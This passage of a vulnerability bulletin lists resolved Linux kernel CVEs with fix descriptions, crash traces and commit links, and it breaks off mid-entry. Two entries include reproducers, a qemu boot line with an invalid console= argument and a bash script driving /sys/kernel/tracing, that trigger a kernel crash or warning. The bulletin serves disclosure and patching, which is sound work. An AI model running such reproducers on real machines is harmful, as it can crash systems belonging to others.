| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: fix out-of-bounds access in tty_driver_lookup_tty() When specifying an invalid console= device like console=tty3270, tty_driver_lookup_tty() returns the tty struct without checking whether index is a valid number. To reproduce: qemu-system-x86_64 -enable-kvm -nographic -serial mon:stdio \ -kernel ../linux-build-x86/arch/x86/boot/bzImage \ -append "console=ttyS0 console=tty3270" This crashes with: [ 0.770599] BUG: kernel NULL pointer dereference, address: 00000000000000ef [ 0.771265] #PF: supervisor read access in kernel mode [ 0.771773] #PF: error_code(0x0000) - not-present page [ 0.772609] Oops: 0000 [#1] PREEMPT SMP PTI [ 0.774878] RIP: 0010:tty_open+0x268/0x6f0 [ 0.784013] chrdev_open+0xbd/0x230 [ 0.784444] ? cdev_device_add+0x80/0x80 [ 0.784920] do_dentry_open+0x1e0/0x410 [ 0.785389] path_openat+0xca9/0x1050 [ 0.785813] do_filp_open+0xaa/0x150 [ 0.786240] file_open_name+0x133/0x1b0 [ 0.786746] filp_open+0x27/0x50 [ 0.787244] console_on_rootfs+0x14/0x4d [ 0.787800] kernel_init_freeable+0x1e4/0x20d [ 0.788383] ? rest_init+0xc0/0xc0 [ 0.788881] kernel_init+0x11/0x120 [ 0.789356] ret_from_fork+0x22/0x30 | 2025-12-30 | not yet calculated | CVE-2023-54198 | https://git.kernel.org/stable/c/3df6f492f500a16c231f07ccc6f6ed1302caddf9 https://git.kernel.org/stable/c/b79109d6470aaae7062998353e3a19449055829d https://git.kernel.org/stable/c/953a4a352a0c185460ae1449e4c6e6658e55fdfc https://git.kernel.org/stable/c/84ea44dc3e4ecb2632586238014bf6722aa5843b https://git.kernel.org/stable/c/f9d9d25ad1f0d060eaf297a2f7f03b5855a45561 https://git.kernel.org/stable/c/765566110eb0da3cf60198b0165ecceeaafa6444 https://git.kernel.org/stable/c/fcfeaa570f7a5c2d5f4f14931909531ff18b7fde https://git.kernel.org/stable/c/db4df8e9d79e7d37732c1a1b560958e8dadfefa1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/adreno: Fix null ptr access in adreno_gpu_cleanup() Fix the below kernel panic due to null pointer access: [ 18.504431] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000048 [ 18.513464] Mem abort info: [ 18.516346] ESR = 0x0000000096000005 [ 18.520204] EC = 0x25: DABT (current EL), IL = 32 bits [ 18.525706] SET = 0, FnV = 0 [ 18.528878] EA = 0, S1PTW = 0 [ 18.532117] FSC = 0x05: level 1 translation fault [ 18.537138] Data abort info: [ 18.540110] ISV = 0, ISS = 0x00000005 [ 18.544060] CM = 0, WnR = 0 [ 18.547109] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000112826000 [ 18.553738] [0000000000000048] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000 [ 18.562690] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP **Snip** [ 18.696758] Call trace: [ 18.699278] adreno_gpu_cleanup+0x30/0x88 [ 18.703396] a6xx_destroy+0xc0/0x130 [ 18.707066] a6xx_gpu_init+0x308/0x424 [ 18.710921] adreno_bind+0x178/0x288 [ 18.714590] component_bind_all+0xe0/0x214 [ 18.718797] msm_drm_bind+0x1d4/0x614 [ 18.722566] try_to_bring_up_aggregate_device+0x16c/0x1b8 [ 18.728105] __component_add+0xa0/0x158 [ 18.732048] component_add+0x20/0x2c [ 18.735719] adreno_probe+0x40/0xc0 [ 18.739300] platform_probe+0xb4/0xd4 [ 18.743068] really_probe+0xfc/0x284 [ 18.746738] __driver_probe_device+0xc0/0xec [ 18.751129] driver_probe_device+0x48/0x110 [ 18.755421] __device_attach_driver+0xa8/0xd0 [ 18.759900] bus_for_each_drv+0x90/0xdc [ 18.763843] __device_attach+0xfc/0x174 [ 18.767786] device_initial_probe+0x20/0x2c [ 18.772090] bus_probe_device+0x40/0xa0 [ 18.776032] deferred_probe_work_func+0x94/0xd0 [ 18.780686] process_one_work+0x190/0x3d0 [ 18.784805] worker_thread+0x280/0x3d4 [ 18.788659] kthread+0x104/0x1c0 [ 18.791981] ret_from_fork+0x10/0x20 [ 18.795654] Code: f9400408 aa0003f3 aa1f03f4 91142015 (f9402516) [ 18.801913] ---[ end trace 0000000000000000 ]--- [ 18.809039] Kernel panic - not syncing: Oops: Fatal exception Patchwork: https://patchwork.freedesktop.org/patch/515605/ | 2025-12-30 | not yet calculated | CVE-2023-54199 | https://git.kernel.org/stable/c/65a8b6d129cfcf63a2b8a36a63d275479ba6a217 https://git.kernel.org/stable/c/b26bd7791f3cdf3c3318162b1d40c9d1910facca https://git.kernel.org/stable/c/399d01375659c273fb6ad9ccfb6e92bc5b891e0d https://git.kernel.org/stable/c/7af606b9eb11d6cdf767cabbddc326e20d0d4702 https://git.kernel.org/stable/c/5fef23c1c0edceb44d16e64e7818f27d48b5bc38 https://git.kernel.org/stable/c/dbeedbcb268d055d8895aceca427f897e12c2b50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: always release netdev hooks from notifier This reverts "netfilter: nf_tables: skip netdev events generated on netns removal". The problem is that when a veth device is released, the veth release callback will also queue the peer netns device for removal. It's possible that the peer netns is also slated for removal. In this case, the device memory is already released before the pre_exit hook of the peer netns runs: BUG: KASAN: slab-use-after-free in nf_hook_entry_head+0x1b8/0x1d0 Read of size 8 at addr ffff88812c0124f0 by task kworker/u8:1/45 Workqueue: netns cleanup_net Call Trace: nf_hook_entry_head+0x1b8/0x1d0 __nf_unregister_net_hook+0x76/0x510 nft_netdev_unregister_hooks+0xa0/0x220 __nft_release_hook+0x184/0x490 nf_tables_pre_exit_net+0x12f/0x1b0 .. Order is: 1. First netns is released, veth_dellink() queues peer netns device for removal 2. peer netns is queued for removal 3. peer netns device is released, unreg event is triggered 4. unreg event is ignored because netns is going down 5. pre_exit hook calls nft_netdev_unregister_hooks but device memory might be free'd already. | 2025-12-30 | not yet calculated | CVE-2023-54200 | https://git.kernel.org/stable/c/8d56f00c61f67b450fbbdcb874855e60ad92c560 https://git.kernel.org/stable/c/30e4b13b1bfbdf3bf3b27036d8209ea1b9f0d880 https://git.kernel.org/stable/c/94032527efbac13be702c76afb9d872c0cca7a43 https://git.kernel.org/stable/c/dc1c9fd4a8bbe1e06add9053010b652449bfe411 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/efa: Fix wrong resources deallocation order When trying to destroy QP or CQ, we first decrease the refcount and potentially free memory regions allocated for the object and then request the device to destroy the object. If the device fails, the object isn't fully destroyed so the user/IB core can try to destroy the object again which will lead to underflow when trying to decrease an already zeroed refcount. Deallocate resources in reverse order of allocating them to safely free them. | 2025-12-30 | not yet calculated | CVE-2023-54201 | https://git.kernel.org/stable/c/cf38960386f3cc4abf395e556af915e4babcafd2 https://git.kernel.org/stable/c/e79db2f51a564fd4daa3e508b987df5e81c34b20 https://git.kernel.org/stable/c/24f9884971f9b34915b67baacf7350a3f6f19ea4 https://git.kernel.org/stable/c/dc202c57e9a1423aed528e4b8dc949509cd32191 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: fix race condition UAF in i915_perf_add_config_ioctl Userspace can guess the id value and try to race oa_config object creation with config remove, resulting in a use-after-free if we dereference the object after unlocking the metrics_lock. For that reason, unlocking the metrics_lock must be done after we are done dereferencing the object. [tursulin: Manually added stable tag.] (cherry picked from commit 49f6f6483b652108bcb73accd0204a464b922395) | 2025-12-30 | not yet calculated | CVE-2023-54202 | https://git.kernel.org/stable/c/6eeb1cba4c9dc47656ea328afa34953c28783d8c https://git.kernel.org/stable/c/240b1502708858b5e3f10b6dc5ca3f148a322fef https://git.kernel.org/stable/c/7eb98f5ac551863efe8be810cea1cd5411d677b1 https://git.kernel.org/stable/c/dc30c011469165d57af9adac5baff7d767d20e5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix slab-out-of-bounds in init_smb2_rsp_hdr When an smb1 mount fails, KASAN detects a slab-out-of-bounds in init_smb2_rsp_hdr like the following one. For an smb1 negotiate (56 bytes), init_smb2_rsp_hdr() for smb2 is called. The issue occurs while handling smb1 negotiate as smb2 server operations. Add smb server operations for smb1 (get_cmd_val, init_rsp_hdr, allocate_rsp_buf, check_user_session) to handle smb1 negotiate so that the smb2 server operation does not handle it. [ 411.400423] CIFS: VFS: Use of the less secure dialect vers=1.0 is not recommended unless required for access to very old servers [ 411.400452] CIFS: Attempting to mount \\192.168.45.139\homes [ 411.479312] ksmbd: init_smb2_rsp_hdr : 492 [ 411.479323] ================================================================== [ 411.479327] BUG: KASAN: slab-out-of-bounds in init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479369] Read of size 16 at addr ffff888488ed0734 by task kworker/14:1/199 [ 411.479379] CPU: 14 PID: 199 Comm: kworker/14:1 Tainted: G OE 6.1.21 #3 [ 411.479386] Hardware name: ASUSTeK COMPUTER INC. Z10PA-D8 Series/Z10PA-D8 Series, BIOS 3801 08/23/2019 [ 411.479390] Workqueue: ksmbd-io handle_ksmbd_work [ksmbd] [ 411.479425] Call Trace: [ 411.479428] <TASK> [ 411.479432] dump_stack_lvl+0x49/0x63 [ 411.479444] print_report+0x171/0x4a8 [ 411.479452] ? kasan_complete_mode_report_info+0x3c/0x200 [ 411.479463] ? init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479497] kasan_report+0xb4/0x130 [ 411.479503] ? init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479537] kasan_check_range+0x149/0x1e0 [ 411.479543] memcpy+0x24/0x70 [ 411.479550] init_smb2_rsp_hdr+0x1e2/0x1f4 [ksmbd] [ 411.479585] handle_ksmbd_work+0x109/0x760 [ksmbd] [ 411.479616] ? _raw_spin_unlock_irqrestore+0x50/0x50 [ 411.479624] ? smb3_encrypt_resp+0x340/0x340 [ksmbd] [ 411.479656] process_one_work+0x49c/0x790 [ 411.479667] worker_thread+0x2b1/0x6e0 [ 411.479674] ? process_one_work+0x790/0x790 [ 411.479680] kthread+0x177/0x1b0 [ 411.479686] ? kthread_complete_and_exit+0x30/0x30 [ 411.479692] ret_from_fork+0x22/0x30 [ 411.479702] </TASK> | 2025-12-30 | not yet calculated | CVE-2023-54203 | https://git.kernel.org/stable/c/921536046bd165efeb07beef5630aff35cd6a489 https://git.kernel.org/stable/c/a8334a0c535d0f0b4d64926c8fe0922ed98f7d43 https://git.kernel.org/stable/c/99a51c673b1d2d0b5a972353401b77612d9cc713 https://git.kernel.org/stable/c/dc8289f912387c3bcfbc5d2db29c8947fa207c11 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: sunplus: fix return value check of mmc_add_host() mmc_add_host() may return an error; if we ignore its return value, 1. the memory allocated in mmc_alloc_host() will be leaked 2. a null-ptr-deref will happen when calling mmc_remove_host() in the remove function spmmc_drv_remove(), because it deletes a device that was never added. Fix this by checking the return value of mmc_add_host(). Moreover, I fixed the error handling path of spmmc_drv_probe() to clean up. | 2025-12-30 | not yet calculated | CVE-2023-54204 | https://git.kernel.org/stable/c/741a951f41929f39cae70c66d86d0754d3129d0a https://git.kernel.org/stable/c/dce6d8f985fa1ef5c2af47f4f86ea65511b78656 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: stm32: Fix refcount leak in stm32_pctrl_get_irq_domain of_irq_find_parent() returns a node pointer with its refcount incremented; we should call of_node_put() on it when it is no longer needed. Add the missing of_node_put() to avoid the refcount leak. | 2025-12-30 | not yet calculated | CVE-2023-54205 | https://git.kernel.org/stable/c/95ab6d7905ebb52dc2ed6357c38e536753824068 https://git.kernel.org/stable/c/8ab860dd8717a7e4a143988885fea0d7e5a9412e https://git.kernel.org/stable/c/af54707c0ccab52b3d532402436ea101011a9299 https://git.kernel.org/stable/c/601be03fa8b81747a154bdef9b559411a5b921e8 https://git.kernel.org/stable/c/9ae053d1eb87875d56f95b6a123a69827225a70e https://git.kernel.org/stable/c/dcef18c8ac40aa85bb339f64c1dd31dd458b06fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: flower: fix filter idr initialization The cited commit moved idr initialization too early in fl_change(), which allows concurrent users to access a filter that is still being initialized and is in an inconsistent state, which, in turn, can cause a NULL pointer dereference [0]. Since there is no obvious way to fix the ordering without reverting the whole cited commit, an alternative approach is taken: first insert a NULL pointer into the idr in order to allocate the handle while still causing fl_get() to return NULL. This prevents concurrent users from seeing the filter while providing the miss-to-action infrastructure with a valid handle id early in fl_change(). [ 152.434728] general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN [ 152.436163] KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] [ 152.437269] CPU: 4 PID: 3877 Comm: tc Not tainted 6.3.0-rc4+ #5 [ 152.438110] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 152.439644] RIP: 0010:fl_dump_key+0x8b/0x1d10 [cls_flower] [ 152.440461] Code: 01 f2 02 f2 c7 40 08 04 f2 04 f2 c7 40 0c 04 f3 f3 f3 65 48 8b 04 25 28 00 00 00 48 89 84 24 00 01 00 00 48 89 c8 48 c1 e8 03 <0f> b6 04 10 84 c0 74 08 3c 03 0f 8e 98 19 00 00 8b 13 85 d2 74 57 [ 152.442885] RSP: 0018:ffff88817a28f158 EFLAGS: 00010246 [ 152.443851] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 152.444826] RDX: dffffc0000000000 RSI: ffffffff8500ae80 RDI: ffff88810a987900 [ 152.445791] RBP: ffff888179d88240 R08: ffff888179d8845c R09: ffff888179d88240 [ 152.446780] R10: ffffed102f451e48 R11: 00000000fffffff2 R12: ffff88810a987900 [ 152.447741] R13: ffffffff8500ae80 R14: ffff88810a987900 R15: ffff888149b3c738 [ 152.448756] FS: 00007f5eb2a34800(0000) GS:ffff88881ec00000(0000) knlGS:0000000000000000 [ 152.449888] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 152.450685] CR2: 000000000046ad19 CR3: 000000010b0bd006 CR4: 0000000000370ea0 [ 152.451641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 152.452628] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 152.453588] Call Trace: [ 152.454032] <TASK> [ 152.454447] ? netlink_sendmsg+0x7a1/0xcb0 [ 152.455109] ? sock_sendmsg+0xc5/0x190 [ 152.455689] ? ____sys_sendmsg+0x535/0x6b0 [ 152.456320] ? ___sys_sendmsg+0xeb/0x170 [ 152.456916] ? do_syscall_64+0x3d/0x90 [ 152.457529] ? entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 152.458321] ? ___sys_sendmsg+0xeb/0x170 [ 152.458958] ? __sys_sendmsg+0xb5/0x140 [ 152.459564] ? do_syscall_64+0x3d/0x90 [ 152.460122] ? entry_SYSCALL_64_after_hwframe+0x46/0xb0 [ 152.460852] ? fl_dump_key_options.part.0+0xea0/0xea0 [cls_flower] [ 152.461710] ? _raw_spin_lock+0x7a/0xd0 [ 152.462299] ? _raw_read_lock_irq+0x30/0x30 [ 152.462924] ? nla_put+0x15e/0x1c0 [ 152.463480] fl_dump+0x228/0x650 [cls_flower] [ 152.464112] ? fl_tmplt_dump+0x210/0x210 [cls_flower] [ 152.464854] ? __kmem_cache_alloc_node+0x1a7/0x330 [ 152.465592] ? nla_put+0x15e/0x1c0 [ 152.466160] tcf_fill_node+0x515/0x9a0 [ 152.466766] ? tc_setup_offload_action+0xf0/0xf0 [ 152.467463] ? __alloc_skb+0x13c/0x2a0 [ 152.468067] ? __build_skb_around+0x330/0x330 [ 152.468814] ? fl_get+0x107/0x1a0 [cls_flower] [ 152.469503] tc_del_tfilter+0x718/0x1330 [ 152.470115] ? is_bpf_text_address+0xa/0x20 [ 152.470765] ? tc_ctl_chain+0xee0/0xee0 [ 152.471335] ? __kernel_text_address+0xe/0x30 [ 152.471948] ? unwind_get_return_address+0x56/0xa0 [ 152.472639] ? __thaw_task+0x150/0x150 [ 152.473218] ? arch_stack_walk+0x98/0xf0 [ 152.473839] ? __stack_depot_save+0x35/0x4c0 [ 152.474501] ? stack_trace_save+0x91/0xc0 [ 152.475119] ? security_capable+0x51/0x90 [ 152.475741] rtnetlink_rcv_msg+0x2c1/0x9d0 [ 152.476387] ? rtnl_calcit.isra.0+0x2b0/0x2b0 [ 152.477042] ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54206 | https://git.kernel.org/stable/c/253a3a324e0ebc2825de76a0f5f17b8383b2023d https://git.kernel.org/stable/c/dd4f6bbfa646f258e5bcdfac57a5c413d687f588 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: uclogic: Correct devm device reference for hidinput input_dev name Reference the HID device rather than the input device for the devm allocation of the input_dev name. Referencing the input_dev would lead to a use-after-free when the input_dev was unregistered and subsequently fires a uevent that depends on the name. At the point of firing the uevent, the name would be freed by devres management. Use devm_kasprintf to simplify the logic for allocating memory and formatting the input_dev name string. | 2025-12-30 | not yet calculated | CVE-2023-54207 | https://git.kernel.org/stable/c/f283805d984343b2f216e2f4c6c7af265b9542ae https://git.kernel.org/stable/c/4c2707dfee5847dc0b5ecfbe512c29c93832fdc4 https://git.kernel.org/stable/c/58f0d1c0e494a88f301bf455da7df4366f179bbb https://git.kernel.org/stable/c/dd613a4e45f8d35f49a63a2064e5308fa5619e29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ov5675: Fix memleak in ov5675_init_controls() There is a kmemleak when testing media/i2c/ov5675.c with a bpf mock device: AssertionError: unreferenced object 0xffff888107362160 (size 16): comm "python3", pid 277, jiffies 4294832798 (age 20.722s) hex dump (first 16 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<00000000abe7d67c>] __kmalloc_node+0x44/0x1b0 [<000000008a725aac>] kvmalloc_node+0x34/0x180 [<000000009a53cd11>] v4l2_ctrl_handler_init_class+0x11d/0x180 [videodev] [<0000000055b46db0>] ov5675_probe+0x38b/0x897 [ov5675] [<00000000153d886c>] i2c_device_probe+0x28d/0x680 [<000000004afb7e8f>] really_probe+0x17c/0x3f0 [<00000000ff2f18e4>] __driver_probe_device+0xe3/0x170 [<000000000a001029>] driver_probe_device+0x49/0x120 [<00000000e39743c7>] __device_attach_driver+0xf7/0x150 [<00000000d32fd070>] bus_for_each_drv+0x114/0x180 [<000000009083ac41>] __device_attach+0x1e5/0x2d0 [<0000000015b4a830>] bus_probe_device+0x126/0x140 [<000000007813deaf>] device_add+0x810/0x1130 [<000000007becb867>] i2c_new_client_device+0x386/0x540 [<000000007f9cf4b4>] of_i2c_register_device+0xf1/0x110 [<00000000ebfdd032>] of_i2c_notify+0xfc/0x1f0 ov5675_init_controls() does not clean up all the allocated resources on its failure path, which may cause the memleak. Add v4l2_ctrl_handler_free() to prevent the memleak. | 2025-12-30 | not yet calculated | CVE-2023-54208 | https://git.kernel.org/stable/c/086a80b842bcb621d6c4eedad20683f1f674d0c2 https://git.kernel.org/stable/c/bcae9115a163198dce9126aa8bedc1c007ec30ed https://git.kernel.org/stable/c/ba54908ae8225d58f1830edb394d4153bcb7d0aa https://git.kernel.org/stable/c/49b849824b9862f177fc77fc92ef95ec54566ecf https://git.kernel.org/stable/c/7a36a6be694df87d019663863b922913947b42af https://git.kernel.org/stable/c/dd74ed6c213003533e3abf4c204374ef01d86978 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: fix blktrace debugfs entries leakage Commit 99d055b4fd4b ("block: remove per-disk debugfs files in blk_unregister_queue") moves blk_trace_shutdown() from blk_release_queue() to blk_unregister_queue(). This is safe if blktrace is created through sysfs; however, there is a regression in a corner case. blktrace can still be enabled after del_gendisk() through ioctl if the disk was opened before del_gendisk(), and if blktrace is not shut down through ioctl before closing the disk, debugfs entries will be leaked. Fix this problem by shutting down blktrace in disk_release(); this is safe because blk_trace_remove() is reentrant. | 2025-12-30 | not yet calculated | CVE-2023-54209 | https://git.kernel.org/stable/c/aa07e56c6a9c7558165690d14eed4fe8babf34fb https://git.kernel.org/stable/c/7149e57cf01184fba175589f8fbe9fbf33be02e1 https://git.kernel.org/stable/c/942e81650b81b4ca62f1d8c61de455c9e7c7e6ca https://git.kernel.org/stable/c/dd7de3704af9989b780693d51eaea49a665bd9c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Avoid use-after-free in dbg for hci_remove_adv_monitor() KASAN reports that there's a use-after-free in hci_remove_adv_monitor(). Trawling through the disassembly, you can see that the complaint is from the access in bt_dev_dbg() under the HCI_ADV_MONITOR_EXT_MSFT case. The problem case happens because msft_remove_monitor() can end up freeing the monitor structure. Specifically: hci_remove_adv_monitor() -> msft_remove_monitor() -> msft_remove_monitor_sync() -> msft_le_cancel_monitor_advertisement_cb() -> hci_free_adv_monitor() Let's fix the problem by just stashing the relevant data when it's still valid. | 2025-12-30 | not yet calculated | CVE-2023-54210 | https://git.kernel.org/stable/c/0d4d6b083da9b033ddccef72d77f373c819ae3ea https://git.kernel.org/stable/c/bf00c2c8f6254f44ac041aa9a311ae9e0caf692b https://git.kernel.org/stable/c/de6dfcefd107667ce2dbedf4d9337f5ed557a4a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Fix warning in trace_buffered_event_disable() A warning happened in trace_buffered_event_disable() at WARN_ON_ONCE(!trace_buffered_event_ref) Call Trace: ? __warn+0xa5/0x1b0 ? trace_buffered_event_disable+0x189/0x1b0 __ftrace_event_enable_disable+0x19e/0x3e0 free_probe_data+0x3b/0xa0 unregister_ftrace_function_probe_func+0x6b8/0x800 event_enable_func+0x2f0/0x3d0 ftrace_process_regex.isra.0+0x12d/0x1b0 ftrace_filter_write+0xe6/0x140 vfs_write+0x1c9/0x6f0 [...] The cause of the warning is that in __ftrace_event_enable_disable(), trace_buffered_event_enable() was called once while trace_buffered_event_disable() was called twice. The reproduction script is shown below; for the analysis, see the comments: ``` #!/bin/bash cd /sys/kernel/tracing/ # 1. Register a 'disable_event' command, then: # 1) SOFT_DISABLED_BIT was set; # 2) trace_buffered_event_enable() was called first time; echo 'cmdline_proc_show:disable_event:initcall:initcall_finish' > \ set_ftrace_filter # 2. Enable the event registered, then: # 1) SOFT_DISABLED_BIT was cleared; # 2) trace_buffered_event_disable() was called first time; echo 1 > events/initcall/initcall_finish/enable # 3. Try to call into cmdline_proc_show(), then SOFT_DISABLED_BIT was # set again!!! cat /proc/cmdline # 4. Unregister the 'disable_event' command, then: # 1) SOFT_DISABLED_BIT was cleared again; # 2) trace_buffered_event_disable() was called second time!!! echo '!cmdline_proc_show:disable_event:initcall:initcall_finish' > \ set_ftrace_filter ``` To fix it, IIUC, we can change to call trace_buffered_event_enable() the first time soft-mode is enabled, and call trace_buffered_event_disable() the last time soft-mode is disabled. | 2025-12-30 | not yet calculated | CVE-2023-54211 | https://git.kernel.org/stable/c/1488d782c9e43087a3f341b8186cd25f3cf75583 https://git.kernel.org/stable/c/b4f4ab423107dc1ba8e9cc6488c645be6403d3f5 https://git.kernel.org/stable/c/cdcc35e6454133feb61561b4e0d0c80e52cbc2ba https://git.kernel.org/stable/c/a6d2fd1703cdc8ecfc3e73987e0fb7474ae2b074 https://git.kernel.org/stable/c/813cede7b2f5a4b1b75d2d4bb4e705cc8e063b20 https://git.kernel.org/stable/c/a3a3c7bddab9b6c5690b20796ef5e332b8c48afb https://git.kernel.org/stable/c/528c9d73153754defb748f0b96ad33308668d817 https://git.kernel.org/stable/c/dea499781a1150d285c62b26659f62fb00824fce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: sisusbvga: Add endpoint checks The syzbot fuzzer was able to provoke a WARNING from the sisusbvga driver: ------------[ cut here ]------------ usb 1-1: BOGUS urb xfer, pipe 3 != type 1 WARNING: CPU: 1 PID: 26 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 Modules linked in: CPU: 1 PID: 26 Comm: kworker/1:1 Not tainted 6.2.0-rc5-syzkaller-00199-g5af6ce704936 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/12/2023 Workqueue: usb_hub_wq hub_event RIP: 0010:usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 Code: 7c 24 18 e8 6c 50 80 fb 48 8b 7c 24 18 e8 62 1a 01 ff 41 89 d8 44 89 e1 4c 89 ea 48 89 c6 48 c7 c7 60 b1 fa 8a e8 84 b0 be 03 <0f> 0b e9 58 f8 ff ff e8 3e 50 80 fb 48 81 c5 c0 05 00 00 e9 84 f7 RSP: 0018:ffffc90000a1ed18 EFLAGS: 00010282 RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000000 RDX: ffff888012783a80 RSI: ffffffff816680ec RDI: fffff52000143d95 RBP: ffff888079020000 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000080000000 R11: 0000000000000000 R12: 0000000000000003 R13: ffff888017d33370 R14: 0000000000000003 R15: ffff888021213600 FS: 0000000000000000(0000) GS:ffff8880b9900000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005592753a60b0 CR3: 0000000022899000 CR4: 00000000003506e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> sisusb_bulkout_msg drivers/usb/misc/sisusbvga/sisusbvga.c:224 [inline] sisusb_send_bulk_msg.constprop.0+0x904/0x1230 drivers/usb/misc/sisusbvga/sisusbvga.c:379 sisusb_send_bridge_packet drivers/usb/misc/sisusbvga/sisusbvga.c:567 [inline] sisusb_do_init_gfxdevice drivers/usb/misc/sisusbvga/sisusbvga.c:2077 [inline] sisusb_init_gfxdevice+0x87b/0x4000 drivers/usb/misc/sisusbvga/sisusbvga.c:2177 sisusb_probe+0x9cd/0xbe2 drivers/usb/misc/sisusbvga/sisusbvga.c:2869 ... The problem was caused by the fact that the driver does not check whether the endpoints it uses are actually present and have the appropriate types. This can be fixed by adding a simple check of the endpoints. | 2025-12-30 | not yet calculated | CVE-2023-54213 | https://git.kernel.org/stable/c/bccb2ccb65515dc66a8001f99f4dcba8a45987f9 https://git.kernel.org/stable/c/a8f980ecb0112100366c64e0404d9dd1dcbd2fcd https://git.kernel.org/stable/c/a730feb672c7d7c5f7414c3715f8e3fa844e5a9b https://git.kernel.org/stable/c/ccef03c5113506d27dd6530d3a9ef5715c068e13 https://git.kernel.org/stable/c/43f569fd0699c4240a5c96e5ba1a0844a595afca https://git.kernel.org/stable/c/d5dba4b7bf904143702fb4be641802ee2e9c95aa https://git.kernel.org/stable/c/0f9028b6ffaa98bff7c479cccf2558247e295534 https://git.kernel.org/stable/c/df05a9b05e466a46725564528b277d0c570d0104 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix potential use-after-free This fixes all instances that need to allocate a buffer by calling alloc_skb, which may release the chan lock and reacquire it later, making it possible for the chan to be disconnected in the meantime. | 2025-12-30 | not yet calculated | CVE-2023-54214 | https://git.kernel.org/stable/c/b2fde8cb2a25125111f2144604e0e7c0ebcc4bba https://git.kernel.org/stable/c/a6a7d1541fefddf7ca0cfb34c1bff63ff809cc49 https://git.kernel.org/stable/c/60aaccf16d1e099c16bebfb96428ae762cb528f7 https://git.kernel.org/stable/c/b8ed41cc04fb74005aa51d17865ca3d022760335 https://git.kernel.org/stable/c/31a288a4df7f6a28e65da22a4ab2add4a963738e https://git.kernel.org/stable/c/64e28ecf44e46de9f01915a4146706a21c3469d2 https://git.kernel.org/stable/c/994e3e18908f5c4a12d07b44018e6aa85f071048 https://git.kernel.org/stable/c/df5703348813235874d851934e957c3723d71644 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-vdpa: Fix cpumask memory leak in virtio_vdpa_find_vqs() Free the cpumask allocated by create_affinity_masks() before returning from the function. | 2025-12-30 | not yet calculated | CVE-2023-54215 | https://git.kernel.org/stable/c/fa450621efab58121fe8e57f7a7b80fee6e0bae1 https://git.kernel.org/stable/c/df9557046440b0a62250fee3169a8f6a139f55a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: TC, Fix using eswitch mapping in nic mode The cited patch uses the eswitch object mapping pool while in nic mode, where it isn't initialized. This results in the trace below [0]. Fix that by using either the nic or the eswitch object mapping pool depending on whether eswitch is enabled. [0]: [ 826.446057] ================================================================== [ 826.446729] BUG: KASAN: slab-use-after-free in mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.447515] Read of size 8 at addr ffff888194485830 by task tc/6233 [ 826.448243] CPU: 16 PID: 6233 Comm: tc Tainted: G W 6.3.0-rc6+ #1 [ 826.448890] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 826.449785] Call Trace: [ 826.450052] <TASK> [ 826.450302] dump_stack_lvl+0x33/0x50 [ 826.450650] print_report+0xc2/0x610 [ 826.450998] ? __virt_addr_valid+0xb1/0x130 [ 826.451385] ? mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.451935] kasan_report+0xae/0xe0 [ 826.452276] ? mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.452829] mlx5_add_flow_rules+0x30/0x490 [mlx5_core] [ 826.453368] ? __kmalloc_node+0x5a/0x120 [ 826.453733] esw_add_restore_rule+0x20f/0x270 